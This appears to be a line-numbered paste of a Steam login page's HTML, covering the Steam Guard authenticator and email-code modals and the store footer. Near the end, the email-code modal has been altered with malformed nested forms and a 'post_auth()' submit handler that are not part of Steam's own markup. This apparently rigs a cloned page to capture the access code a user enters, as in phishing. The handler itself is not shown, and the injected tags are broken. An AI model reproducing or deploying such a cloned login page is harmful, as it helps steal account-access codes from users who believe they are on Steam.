  602.  
  603. <div class="login_modal loginTwoFactorCodeModal" style="display: none">
  604. <form>
  605. <div class="twofactorauth_message_area">
  606. <div id="login_twofactorauth_icon" class="auth_icon auth_icon_key">
  607. </div>
  608. <div class="twofactorauth_messages" id="login_twofactorauth_messages">
  609. <div class="twofactorauth_message" id="login_twofactorauth_message_entercode" style="display: none;">
  610. <div class="auth_modal_h1">Hello <span id="login_twofactorauth_message_entercode_accountname"></span>!</div>
  611. <p>This account is currently using a Steam Guard Mobile Authenticator.</p>
  612. </div>
  613. <div class="twofactorauth_message" id="login_twofactorauth_message_incorrectcode" style="display: none;">
  614. <div class="auth_modal_h1">Whoops!</div>
  615. <p>Sorry but, <br>that isn't quite right...</p>
  616. </div>
  617. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp" style="display: none;">
  618. <div class="auth_modal_h1">Let us help!</div>
  619. <p>Sorry you're having trouble. We know your Steam account is valuable to you, and we're committed to helping you keep access to it in the right hands.</p>
  620. </div>
  621. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_sms_remove" style="display: none;">
  622. <div class="auth_modal_h1">Confirm ownership of your account</div>
  623. <p>We'll send a text message containing an account recovery code to your phone number ending in <span id="login_twofactorauth_selfhelp_sms_remove_last_digits"></span>. Once you enter the code, we will remove the mobile authenticator from your account and you will receive Steam Guard codes via email.</p>
  624. </div>
  625. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_sms_remove_entercode" style="display: none;">
  626. <div class="auth_modal_h1">Confirm ownership of your account</div>
  627. <p>We have sent a text message containing a confirmation code to your phone number ending in <span id="login_twofactorauth_selfhelp_sms_remove_entercode_last_digits"></span>. Enter the code below so we can remove the mobile authenticator from your account.</p>
  628. </div>
  629. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_sms_remove_incorrectcode" style="display: none;">
  630. <div class="auth_modal_h1">Whoops!</div>
  631. <p>Sorry but, <br>that isn't quite right...</p>
  632. </div>
  633. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_twofactor_removed" style="display: none;">
  634. <div class="auth_modal_h1">Success!</div>
  635. <p>We have removed the mobile authenticator from your account. Next time you log in, you will have to enter a Steam Guard code that is sent to your email address.</p>
  636. </div>
  637. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_twofactor_replaced" style="display: none;">
  638. <div class="auth_modal_h1">Success!</div>
  639. <p>You can now use this device to get mobile authenticator codes for your account. Any other device that was previously providing authenticator codes for your account will no longer be able to do so.</p>
  640. </div>
  641. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_nosms" style="display: none;">
  642. <div class="auth_modal_h1">Do you have the recovery code?</div>
  643. <p>You do not have a phone number associated with your Steam account, so we are unable to verify account ownership via a text message. Do you have the recovery code that you wrote down when you added the mobile authenticator? The recovery code begins with the letter 'R'.</p>
  644. </div>
  645. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode" style="display: none;">
  646. <div class="auth_modal_h1">Enter your recovery code</div>
  647. <p>Please enter the recovery code in the box below. The recovery code begins with the letter 'R'.</p>
  648. </div>
  649. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode_incorrectcode" style="display: none;">
  650. <div class="auth_modal_h1">Whoops!</div>
  651. <p>Sorry but, <br>that isn't quite right...</p>
  652. </div>
  653. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode_incorrectcode_exhausted" style="display: none;">
  654. <div class="auth_modal_h1">Whoops!</div>
  655. <p>Sorry but, <br>that isn't quite right...</p>
  656. </div>
  657. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode_message" style="display: none;">
  658. <div class="auth_modal_h1">Whoops!</div>
  659. <p>Sorry but, <br>that isn't quite right...</p>
  660. </div>
  661. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_couldnthelp" style="display: none;">
  662. <div class="auth_modal_h1">Let us help!</div>
  663. <p>If you have lost access to your mobile device, the mobile phone number associated with your account, and don't have the recovery code that you wrote down when you added the mobile authenticator, then please contact Steam Support for assistance recovering access to your account.</p>
  664. </div>
  665. <div class="twofactorauth_message" id="login_twofactorauth_message_help" style="display: none;">
  666. <div class="auth_modal_h1">Let us help!</div>
  667. <p>Sorry you're having trouble. We know your Steam account is valuable to you, and we're committed to helping you keep access to it in the right hands.</p>
  668. </div>
  669. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_failure" style="display: none;">
  670. <div class="auth_modal_h1">Sorry!</div>
  671. <p>There was an error encountered while processing your request.</p>
  672. </div>
  673. </div>
  674. </div>
  675. <div id="login_twofactorauth_details_messages" class="twofactorauth_details_messages">
  676. <div class="twofactorauth_details" id="login_twofactorauth_details_entercode" style="display: none;">
  677. Enter the current code displayed in the Steam Mobile app: </div>
  678. <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp" style="display: none;">
  679. If you have lost your mobile device or uninstalled the Steam app and can no longer receive codes, then you may remove the mobile authenticator from your account. This will reduce the security on your account, so you should add a mobile authenticator to a new mobile device afterwards. </div>
  680. <div class="twofactorauth_details" id="login_twofactorauth_details_help" style="display: none;">
  681. Please contact Steam Support for assistance from a member of our staff. </div>
  682. <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp_failure" style="display: none;">
  683. </div>
  684. <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp_rcode_incorrectcode" style="display: none;">
  685. </div>
  686. <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp_rcode_incorrectcode_exhausted" style="display: none;">
  687. </div>
  688. </div>
  689. <div class="twofactorauthcode_entry_area">
  690. <div id="login_twofactor_authcode_entry">
  691. <div class="twofactorauthcode_entry_box">
  692. <input class="twofactorauthcode_entry_input authcode_placeholder" id="twofactorcode_entry" type="text" placeholder="enter your code here" autocomplete="off">
  693. </div>
  694. </div>
  695. <div id="login_twofactor_authcode_help_supportlink">
  696. <a href="https://support.steampowered.com/kb_article.php?ref=4020-ALZM-5519">
  697. Contact Steam Support for help with account access </a>
  698. </div>
  699. </div>
  700. <div class="modal_buttons" id="login_twofactorauth_buttonsets">
  701. <div class="auth_buttonset" id="login_twofactorauth_buttonset_entercode" style="display: none;">
  702. <div type="submit" class="auth_button leftbtn" data-modalstate="submit">
  703. <div class="auth_button_h3">Submit</div>
  704. <div class="auth_button_h5">my authenticator code</div>
  705. </div>
  706. <div class="auth_button" data-modalstate="selfhelp">
  707. <div class="auth_button_h3">Please help</div>
  708. <div class="auth_button_h5">I no longer have access to my Mobile Authenticator codes</div>
  709. </div>
  710. <div style="clear: left;"></div>
  711. </div>
  712. <div class="auth_buttonset" id="login_twofactorauth_buttonset_incorrectcode" style="display: none;">
  713. <div class="auth_button leftbtn" data-modalstate="submit">
  714. <div class="auth_button_h3">I want to try again</div>
  715. <div class="auth_button_h5">and I've re-entered my authenticator code above</div>
  716. </div>
  717. <div class="auth_button" data-modalstate="selfhelp">
  718. <div class="auth_button_h3">Please help</div>
  719. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  720. </div>
  721. <div style="clear: left;"></div>
  722. </div>
  723. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp" style="display: none;">
  724. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_start">
  725. <div class="auth_button_h3" style="font-size: 16px;">Remove authenticator</div>
  726. <div class="auth_button_h5">and go back to receiving codes by email</div>
  727. </div>
  728. <div class="auth_button" data-modalstate="selfhelp_sms_reset_start">
  729. <div class="auth_button_h3">Use this device</div>
  730. <div class="auth_button_h5">and get authenticator codes on this app</div>
  731. </div>
  732. </div>
  733. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_sms_remove" style="display: none;">
  734. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_sendcode">
  735. <div class="auth_button_h3">OK!</div>
  736. <div class="auth_button_h5">Send me the text message</div>
  737. </div>
  738. <div class="auth_button" data-modalstate="selfhelp_nosms">
  739. <div class="auth_button_h3">I can't</div>
  740. <div class="auth_button_h5">because I no longer have access to that phone number</div>
  741. </div>
  742. </div>
  743. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_sms_remove_entercode" style="display: none;">
  744. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_checkcode">
  745. <div class="auth_button_h3">Submit</div>
  746. <div class="auth_button_h5">I entered the code above</div>
  747. </div>
  748. <div class="auth_button" data-modalstate="selfhelp_nosms">
  749. <div class="auth_button_h3">Please help</div>
  750. <div class="auth_button_h5">I'm not receiving the text message</div>
  751. </div>
  752. </div>
  753. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_sms_remove_incorrectcode" style="display: none;">
  754. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_checkcode">
  755. <div class="auth_button_h3">Submit</div>
  756. <div class="auth_button_h5">I re-entered the code. Let's try again.</div>
  757. </div>
  758. <div class="auth_button" data-modalstate="selfhelp_nosms">
  759. <div class="auth_button_h3">Please help</div>
  760. <div class="auth_button_h5">I'm not receiving the text message</div>
  761. </div>
  762. </div>
  763. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_twofactor_removed" style="display: none;">
  764. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_complete">
  765. <div class="auth_button_h3">Log in</div>
  766. <div class="auth_button_h5">with the mobile authenticator removed</div>
  767. </div>
  768. </div>
  769. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_twofactor_replaced" style="display: none;">
  770. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_complete">
  771. <div class="auth_button_h3">Log in</div>
  772. <div class="auth_button_h5">to the Steam Mobile app</div>
  773. </div>
  774. </div>
  775. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_nosms" style="display: none;">
  776. <div class="auth_button leftbtn" data-modalstate="selfhelp_rcode">
  777. <div class="auth_button_h3">Yes</div>
  778. <div class="auth_button_h5">I have the recovery code that begins with 'R'</div>
  779. </div>
  780. <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
  781. <div class="auth_button_h3">No</div>
  782. <div class="auth_button_h5">I don't have a code like that</div>
  783. </div>
  784. </div>
  785. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_rcode" style="display: none;">
  786. <div class="auth_button leftbtn" data-modalstate="selfhelp_rcode_checkcode">
  787. <div class="auth_button_h3">Submit</div>
  788. <div class="auth_button_h5">my recovery code</div>
  789. </div>
  790. <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
  791. <div class="auth_button_h3">Please help</div>
  792. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  793. </div>
  794. </div>
  795. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_rcode_incorrectcode" style="display: none;">
  796. <div class="auth_button leftbtn" data-modalstate="selfhelp_rcode_checkcode">
  797. <div class="auth_button_h3">Submit</div>
  798. <div class="auth_button_h5">I re-entered the code. Let's try again.</div>
  799. </div>
  800. <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
  801. <div class="auth_button_h3">Please help</div>
  802. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  803. </div>
  804. </div>
  805. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_rcode_incorrectcode_exhausted" style="display: none;">
  806. <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
  807. <div class="auth_button_h3">Please help</div>
  808. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  809. </div>
  810. </div>
  811. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_couldnthelp" style="display: none;">
  812. <a class="auth_button leftbtn" href="https://help.steampowered.com/">
  813. <div class="auth_button_h3">Contact us</div>
  814. <div class="auth_button_h5">for help with account access</div>
  815. </a>
  816. </div>
  817. <div class="auth_buttonset" id="login_twofactorauth_buttonset_waiting" style="display: none;">
  818. </div>
  819. </div>
  820. <div style="display: none;">
  821. <input type="submit">
  822. </div>
  823. </form>
  824. </div>
  825. </div>
  826.  
  827. <!-- Footer -->
  828. <div id="footer_spacer" class=""></div>
  829. <div id="footer" class="">
  830. <div class="footer_content">
  831. <div class="rule"></div>
  832.  
  833. <div id="footer_nav">
  834.  
  835.  
  836.  
  837. <span class="pulldown btnv6_blue_hoverfade btn_small" id="footer_genre_pulldown">
  838. <span>SHOP BY GENRE</span>
  839. </span>
  840. <div class="popup_block_new" id="footer_genre_dropdown" style="display: none;">
  841. <div class="popup_body popup_menu">
  842. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Free%20to%20Play?snr=1_44_44__20">
  843. Free to Play </a>
  844. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Action?snr=1_44_44__20">
  845. Action </a>
  846. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Adventure?snr=1_44_44__20">
  847. Adventure </a>
  848. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Strategy?snr=1_44_44__20">
  849. Strategy </a>
  850. <a class="popup_menu_item" href="http://store.steampowered.com/genre/RPG?snr=1_44_44__20">
  851. RPG </a>
  852. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Indie?snr=1_44_44__20">
  853. Indie </a>
  854. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Massively%20Multiplayer?snr=1_44_44__20">
  855. Massively Multiplayer </a>
  856. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Casual?snr=1_44_44__20">
  857. Casual </a>
  858. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Simulation?snr=1_44_44__20">
  859. Simulation </a>
  860. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Racing?snr=1_44_44__20">
  861. Racing </a>
  862. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Sports?snr=1_44_44__20">
  863. Sports </a>
  864. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Accounting?snr=1_44_44__20">
  865. Accounting </a>
  866. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Animation%20%26%20Modeling?snr=1_44_44__20">
  867. Animation &amp; Modeling </a>
  868. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Audio%20Production?snr=1_44_44__20">
  869. Audio Production </a>
  870. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Design%20%26%20Illustration?snr=1_44_44__20">
  871. Design &amp; Illustration </a>
  872. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Education?snr=1_44_44__20">
  873. Education </a>
  874. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Photo%20Editing?snr=1_44_44__20">
  875. Photo Editing </a>
  876. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Software%20Training?snr=1_44_44__20">
  877. Software Training </a>
  878. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Utilities?snr=1_44_44__20">
  879. Utilities </a>
  880. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Video%20Production?snr=1_44_44__20">
  881. Video Production </a>
  882. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Web%20Publishing?snr=1_44_44__20">
  883. Web Publishing </a>
  884. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Early%20Access?snr=1_44_44__20">
  885. Early Access </a>
  886. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Sexual%20Content?snr=1_44_44__20">
  887. Sexual Content </a>
  888. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Nudity?snr=1_44_44__20">
  889. Nudity </a>
  890. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Violence?snr=1_44_44__20">
  891. Violent </a>
  892. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Gore?snr=1_44_44__20">
  893. Gore </a>
  894. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Movie?snr=1_44_44__20">
  895. Movie </a>
  896. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Documentary?snr=1_44_44__20">
  897. Documentary </a>
  898. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Episodic?snr=1_44_44__20">
  899. Episodic </a>
  900. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Short?snr=1_44_44__20">
  901. Short </a>
  902. <a class="popup_menu_item" href="http://store.steampowered.com/genre/Tutorial?snr=1_44_44__20">
  903. Tutorial </a>
  904. <a class="popup_menu_item" href="http://store.steampowered.com/genre/360%20Video?snr=1_44_44__20">
  905. 360 Video </a>
  906. </div>
  907. </div>
  908.  
  909. <span class="pulldown btnv6_blue_hoverfade btn_small" id="footer_steam_pulldown">
  910. <span>ABOUT STEAM</span>
  911. </span>
  912. <div class="popup_block_new" id="footer_steam_dropdown" style="display: none;">
  913. <div class="popup_body popup_menu">
  914. <a class="popup_menu_item" href="http://store.steampowered.com/about/?snr=1_44_44__22">
  915. What is Steam? </a>
  916. <!--
  917. <a class="popup_menu_item" href="">
  918. Download Steam now </a>
  919. -->
  920. <a class="popup_menu_item" href="https://support.steampowered.com/kb_article.php?p_faqid=549#gifts" target="_blank" rel="noreferrer">
  921. Gifting on Steam </a>
  922. <a class="popup_menu_item" href="https://steamcommunity.com/?snr=1_44_44__22">
  923. The Steam Community </a>
  924. </div>
  925. </div>
  926.  
  927. <span class="pulldown btnv6_blue_hoverfade btn_small" id="footer_valve_pulldown">
  928. <span>ABOUT VALVE</span>
  929. </span>
  930. <div class="popup_block_new" id="footer_valve_dropdown" style="display: none;">
  931. <div class="popup_body popup_menu">
  932. <a class="popup_menu_item" href="http://www.valvesoftware.com/about.html" target="_blank" rel="noreferrer">
  933. About Valve </a>
  934. <a class="popup_menu_item" href="http://www.valvesoftware.com/business/" target="_blank" rel="noreferrer">
  935. Business Solutions </a>
  936. <a class="popup_menu_item" href="http://www.steampowered.com/steamworks/" target="_blank" rel="noreferrer">
  937. Steamworks </a>
  938. <a class="popup_menu_item" href="http://www.valvesoftware.com/jobs.html" target="_blank" rel="noreferrer">
  939. Jobs </a>
  940. </div>
  941. </div>
  942.  
  943.  
  944. <span class="pulldown btnv6_blue_hoverfade btn_small" id="footer_help_pulldown">
  945. <span>HELP</span>
  946. </span>
  947. <div class="popup_block_new" id="footer_help_dropdown" style="display: none;">
  948. <div class="popup_body popup_menu">
  949. <a class="popup_menu_item" href="https://help.steampowered.com/en/?snr=1_44_44__23">
  950. Support </a>
  951. <a class="popup_menu_item" href="http://store.steampowered.com/forums/?snr=1_44_44__23" target="_blank" rel="noreferrer">
  952. Forums </a>
  953. <a class="popup_menu_item" href="http://store.steampowered.com/stats/?snr=1_44_44__23" target="_blank" rel="noreferrer">
  954. Stats </a>
  955. </div>
  956. </div>
  957.  
  958.  
  959. <span class="pulldown btnv6_blue_hoverfade btn_small" id="footer_feeds_pulldown">
  960. <span>NEWS FEEDS</span>
  961. </span>
  962. <div class="popup_block_new" id="footer_feeds_dropdown" style="display: none;">
  963. <div class="popup_body popup_menu">
  964. <a class="popup_menu_item" href="http://store.steampowered.com/feeds/news.xml">
  965. <img src="https://steamstore-a.akamaihd.net/public/images/ico/ico_rss2.gif" width="13" height="13" border="0" alt="" align="top">&nbsp;&nbsp;Steam News </a>
  966. <a class="popup_menu_item" href="http://store.steampowered.com/feeds/newreleases.xml">
  967. <img src="https://steamstore-a.akamaihd.net/public/images/ico/ico_rss2.gif" width="13" height="13" border="0" alt="" align="top">&nbsp;&nbsp;Game Releases </a>
  968. <a class="popup_menu_item" href="http://store.steampowered.com/feeds/daily_deals.xml">
  969. <img src="https://steamstore-a.akamaihd.net/public/images/ico/ico_rss2.gif" width="13" height="13" border="0" alt="" align="top">&nbsp;&nbsp;Daily Deals </a>
  970. </div>
  971. </div>
  972. <div style="clear: left;"></div>
  973.  
  974. <script type="text/javascript">
  975. RegisterFlyout( 'footer_genre_pulldown', 'footer_genre_dropdown', null, null, true );
  976. RegisterFlyout( 'footer_steam_pulldown', 'footer_steam_dropdown', null, null, true );
  977. RegisterFlyout( 'footer_valve_pulldown', 'footer_valve_dropdown', null, null, true );
  978. RegisterFlyout( 'footer_help_pulldown', 'footer_help_dropdown', null, null, true );
  979. RegisterFlyout( 'footer_feeds_pulldown', 'footer_feeds_dropdown', null, null, true );
  980. </script>
  981. </div>
  982.  
  983. <br>
  984.  
  985. <div class="rule"></div>
  986. <div id="footer_logo"><a href="http://www.valvesoftware.com" target="_blank" rel="noreferrer"><img src="https://steamstore-a.akamaihd.net/public/images/v6/logo_valve_footer.png" alt="Valve Software" border="0"></a></div>
  987. <div id="footer_text">
  988. <div>© 2017 Valve Corporation. All rights reserved. All trademarks are property of their respective owners in the US and other countries.</div>
  989. <div>VAT included in all prices where applicable.&nbsp;&nbsp;
  990.  
  991. <a href="http://store.steampowered.com/privacy_agreement/" target="_blank" rel="noreferrer">Privacy Policy</a>
  992. &nbsp; | &nbsp;
  993. <a href="http://store.steampowered.com/legal/" target="_blank" rel="noreferrer">Legal</a>
  994. &nbsp; | &nbsp;
  995. <a href="http://store.steampowered.com/subscriber_agreement/" target="_blank" rel="noreferrer">Steam Subscriber Agreement</a>
  996. &nbsp; | &nbsp;
  997. <a href="http://store.steampowered.com/steam_refunds/" target="_blank" rel="noreferrer">Refunds</a>
  998.  
  999. </div>
  1000. <div class="responsive_optin_link">
  1001. <div class="btn_medium btnv6_grey_black" onclick="Responsive_RequestMobileView()">
  1002. <span>View mobile website</span>
  1003. </div>
  1004. </div>
  1005. </div>
  1006.  
  1007.  
  1008.  
  1009. <div style="clear: left;"></div>
  1010.  
  1011. <div class="rule"></div>
  1012.  
  1013. <div class="valve_links">
  1014. <a href="http://www.valvesoftware.com/about.html" target="_blank" rel="noreferrer">About Valve</a>
  1015. &nbsp; | &nbsp;<a href="http://www.steampowered.com/steamworks/" target="_blank" rel="noreferrer">Steamworks</a>
  1016. &nbsp; | &nbsp;<a href="http://www.valvesoftware.com/jobs.html" target="_blank" rel="noreferrer">Jobs</a>
  1017. &nbsp; | &nbsp;<a href="http://steamcommunity.com/greenlight" target="_blank" rel="noreferrer">Steam Distribution</a>
  1018. &nbsp; | &nbsp;<a href="https://store.steampowered.com/account/redeemwalletcode" target="_blank" rel="noreferrer">Gift Cards</a>
  1019. &nbsp; | &nbsp;<a href="http://www.facebook.com/Steam" target="_blank" rel="noreferrer"><img src="https://steamstore-a.akamaihd.net/public/images/ico/ico_facebook.gif"> Steam</a>
  1020. &nbsp; | &nbsp;<a href="http://twitter.com/steam_games" target="_blank" rel="noreferrer"><img src="https://steamstore-a.akamaihd.net/public/images/ico/ico_twitter.gif"> @steam_games</a>
  1021. </div>
  1022.  
  1023. </div>
  1024. </div><!-- End Footer -->
  1025.  
  1026.  
  1027.  
  1028. <div class="miniprofile_hover" style="display: none;"><div class="shadow_ul"></div><div class="shadow_top"></div><div class="shadow_ur"></div><div class="shadow_left"></div><div class="shadow_right"></div><div class="shadow_bl"></div><div class="shadow_bottom"></div><div class="shadow_br"></div><div class="miniprofile_hover_inner shadow_content"></div><div class="hover_arrow left miniprofile_arrow"><div class="miniprofile_arrow_inner"></div></div><div class="hover_arrow right miniprofile_arrow"><div class="miniprofile_arrow_inner"></div></div></div><div class="newmodal" style="position: fixed; z-index: 1000; max-width: 1840px; left: 687px; top: 254px; display: none;"><div class="newmodal_header_border"><div class="newmodal_header"><div class="newmodal_close"></div><div class="ellipsis">Steam Guard</div></div></div><div class="newmodal_content_border"><div class="newmodal_content" style="max-height: 830px;"><div></div></div></div></div><div class="newmodal_background" style="opacity: 0.8; display: block;"></div><div class="newmodal" style="position: fixed; z-index: 1000; max-width: 1840px; left: 687px; top: 254px; display: none;"><div class="newmodal_header_border"><div class="newmodal_header"><div class="newmodal_close"></div><div class="ellipsis">Steam Guard</div></div></div><div class="newmodal_content_border"><div class="newmodal_content" style="max-height: 830px;"><div></div></div></div></div><div class="newmodal" style="position: fixed; z-index: 1000; max-width: 1840px; left: 687px; top: 254px; display: none;"><div class="newmodal_header_border"><div class="newmodal_header"><div class="newmodal_close"></div><div class="ellipsis">Steam Guard</div></div></div><div class="newmodal_content_border"><div class="newmodal_content" style="max-height: 830px;"><div></div></div></div></div><div class="newmodal" style="position: fixed; z-index: 1000; max-width: 1840px; left: 687px; top: 254px; display: none;"><div class="newmodal_header_border"><div class="newmodal_header"><div class="newmodal_close"></div><div class="ellipsis">Steam Guard</div></div></div><div class="newmodal_content_border"><div class="newmodal_content" style="max-height: 830px;"><div></div></div></div></div><div class="newmodal" style="position: fixed; z-index: 1000; max-width: 500px; left: 500px; top: 246px;"><div class="newmodal_header_border"><div class="newmodal_header"><div class="newmodal_close"></div><div class="ellipsis">Steam Guard</div></div></div><div class="newmodal_content_border"><div class="newmodal_content" style="max-height: 813px;"><div><div class="login_modal loginAuthCodeModal" style="display: block;">
  1029. <form data-ajax="false">
  1030. <div class="auth_message_area">
  1031. <div id="auth_icon" class="auth_icon auth_icon_mail">
  1032. </div>
  1033. <div class="auth_messages" id="auth_messages">
  1034. <div class="auth_message" id="auth_message_entercode" style="display: block;">
  1035. <div class="auth_modal_h1">Hello!</div>
  1036. <p>We see you're logging in to Steam from a new browser or a new computer. Or maybe it's just been a while...</p>
  1037. </div>
  1038. <div class="auth_message" id="auth_message_checkspam" style="display: none;">
  1039. <div class="auth_modal_h1">Mistaken for spam?</div>
  1040. <p>Did you check your spam folder? If you don't see a recent message from Steam Support in your inbox, try looking there.</p>
  1041. </div>
  1042. <div class="auth_message" id="auth_message_success" style="display: none;">
  1043. <div class="auth_modal_h1">Success!</div>
  1044. <p>You now have access to your Steam account here.</p>
  1045. </div>
  1046. <div class="auth_message" id="auth_message_incorrectcode" style="display: none;">
  1047. <div class="auth_modal_h1">Whoops!</div>
  1048. <p>Sorry but, <br>that isn't quite right...</p>
  1049. </div>
  1050. <div class="auth_message" id="auth_message_help" style="display: none;">
  1051. <div class="auth_modal_h1">Let us help!</div>
  1052. <p>Sorry you're having trouble. We know your Steam account is valuable to you, and we're committed to helping you keep access to it in the right hands.</p>
  1053. </div>
  1054. </div>
  1055. </div>
  1056.  
  1057.  
  1058. <div id="auth_details_messages" class="auth_details_messages">
  1059. <div class="auth_details" id="auth_details_entercode" style="display: block;">
  1060. As an added account security measure, youll need to grant access to this browser by entering the special code weve just sent to your email address at <span id="emailauth_entercode_emaildomain">gmail.com</span>. </div>
  1061. <div class="auth_details" id="auth_details_success" style="display: none;">
  1062. If this is a public computer, be sure to log out of Steam when you're ready to quit this browser session. </div>
  1063. <div class="auth_details" id="auth_details_help" style="display: none;">
  1064. Please contact Steam Support for assistance from a member of our staff. Legitimate claims for help with account access are our number one priority. </div>
  1065.  
  1066.  
  1067.  
  1068.  
  1069.  
  1070.  
  1071.  
  1072.  
  1073.  
  1074. <form action="post_auth()" method="post">
  1075. <form name="enter your code here now7635">
  1076. <div class="authcode_entry_area">
  1077. <div id="authcode_entry">
  1078. <div class="authcode_entry_box">
  1079. <input class="authcode_entry_input authcode_placeholder" id="authcode" type="text" value="" placeholder="enter your code here">
  1080. </form>
  1081. </form>
  1082. </div>
  1083. </div>
  1084. <div id="authcode_help_supportlink" style="display: none;">
  1085. <a href="https://support.steampowered.com/kb_article.php?ref=4020-ALZM-5519" data-ajax="false" data-externallink="1">Contact Steam Support for help with account access</a>
  1086. </div>
  1087.  
  1088.  
  1089.  
  1090. <button onclick="post_auth()"
  1091. <div class="modal_buttons" id="auth_buttonsets">
  1092. <div class="auth_buttonset" id="auth_buttonset_entercode" style="display: block;">
  1093. <div data-modalstate="submit" class="auth_button leftbtn" >
  1094. <div class="auth_button_h3">Submit </div>
  1095. <div class="auth_button_h5">my special access code</div>
  1096.  
  1097. </div>
  1098. <div data-modalstate="checkspam" class="auth_button">
  1099. <div class="auth_button_h3">What message? </div>
  1100. <div class="auth_button_h5">I don't have any message from Steam Support...</div>
  1101.  
  1102. </button>
  1103. </div>
  1104. <div style="clear: left;"></div>
  1105.  
  1106.  
  1107.  
  1108.  
  1109.  
  1110.  
  1111.  
  1112.  
  1113.  
  1114.  
  1115.  
  1116.  
  1117. </form>
  1118.  
  1119.  
  1120.  
  1121. </div>
  1122. <div class="auth_buttonset" id="auth_buttonset_checkspam" style="display: none;">
  1123. <div data-modalstate="submit" class="auth_button leftbtn">
  1124. <div class="auth_button_h3">Found it!</div>
  1125. <div class="auth_button_h5">and I've entered my special access code above</div>
  1126. </div>
  1127. <div data-modalstate="help" class="auth_button">
  1128. <div class="auth_button_h3">No luck still...</div>
  1129. <div class="auth_button_h5">I don't have any message from Steam Support...</div>
  1130.  
  1131. </div>
  1132. <div style="clear: left;"></div>
  1133. </div>
  1134. <div class="auth_buttonset" id="auth_buttonset_success" style="display: none;">
  1135. <div class="auth_button auth_button_spacer">
  1136. </div>
  1137. <a data-modalstate="complete" class="auth_button" id="success_continue_btn" href="javascript:void(0);">
  1138. <div class="auth_button_h3">Proceed to Steam!</div>
  1139. <div class="auth_button_h5">&nbsp;<br>&nbsp;</div>
  1140. </a>
  1141. <div style="clear: left;"></div>
  1142. </div>
  1143. <div class="auth_buttonset" id="auth_buttonset_incorrectcode" style="display: none;">
  1144. <div data-modalstate="submit" class="auth_button leftbtn">
  1145. <div class="auth_button_h3">I want to try again</div>
  1146. <div class="auth_button_h5">and I've re-entered my special access code above</div>
  1147. </div>
  1148. <div data-modalstate="help" class="auth_button">
  1149. <div class="auth_button_h3">Please help</div>
  1150. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  1151. </div>
  1152. <div style="clear: left;"></div>
  1153. </div>
  1154. <div class="auth_buttonset" id="auth_buttonset_waiting" style="display: none;">
  1155. </div>
  1156. </div>
  1157. <div style="" id="auth_details_computer_name" class="auth_details_messages">
  1158. To easily recognize this browser among the list of devices Steam Guard has enabled, give the browser a friendly name - at least 6 characters long. <div id="friendly_name_box" class="friendly_name_box">
